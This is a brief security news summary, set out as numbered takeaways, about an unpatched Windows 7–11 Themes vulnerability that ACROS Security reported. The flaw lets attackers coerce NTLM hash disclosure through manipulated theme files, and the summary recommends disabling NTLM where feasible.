October 29, 2024 at 06:05PM
A recently reported 0-day vulnerability affects all Windows versions from 7 to 11, allowing attackers to capture NTLM authentication hashes via authentication coercion attacks. Discovered by ACROS Security while addressing another vulnerability, the flaw requires user interaction and could be exploited through manipulated Windows themes. Microsoft is aware and may respond accordingly.
### Meeting Takeaways
1. **Vulnerability Overview:**
– All Windows client versions from Windows 7 to Windows 11 have a 0-day vulnerability that may allow attackers to capture NTLM authentication hashes.
2. **Discovery and Reporting:**
– The vulnerability was reported to Microsoft by ACROS Security during their work on patching CVE-2024-38030, a previously identified Windows Themes spoofing vulnerability.
3. **Related Vulnerabilities:**
– The newly discovered flaw is similar to two earlier vulnerabilities (CVE-2024-21320 and CVE-2024-38030) related to Windows themes and improper path validation leading to authentication coercion attacks.
4. **Mechanism of Attack:**
– Attackers could exploit this vulnerability by using manipulated themes to trick vulnerable devices into sending NTLM hashes to their server.
5. **Recommendations:**
– Organizations are advised to disable NTLM where feasible; however, this may hinder functionality if certain network components depend on NTLM.
6. **Potential Exploitation Requirements:**
– Successful exploitation requires the user to interact with a malicious theme file, either by manually copying it or unintentionally downloading it from an attacker’s website.
7. **Microsoft’s Response:**
– Microsoft is aware of the vulnerability report and will take necessary actions but has not yet issued a CVE for this particular issue.
8. **Difficulties in Fixing:**
– Addressing the vulnerability may be complicated due to the complex nature of UNC paths and the possibility of additional vulnerable key,value pairs being overlooked in prior patches.
9. **Future Actions:**
– ACROS plans to release more details and a proof-of-concept after Microsoft publishes their patch.
10. **Nature of Attack:**
– Exploitation is more likely to occur in targeted campaigns rather than mass exploitation due to the requirement of user interaction and network accessibility for the attack to succeed.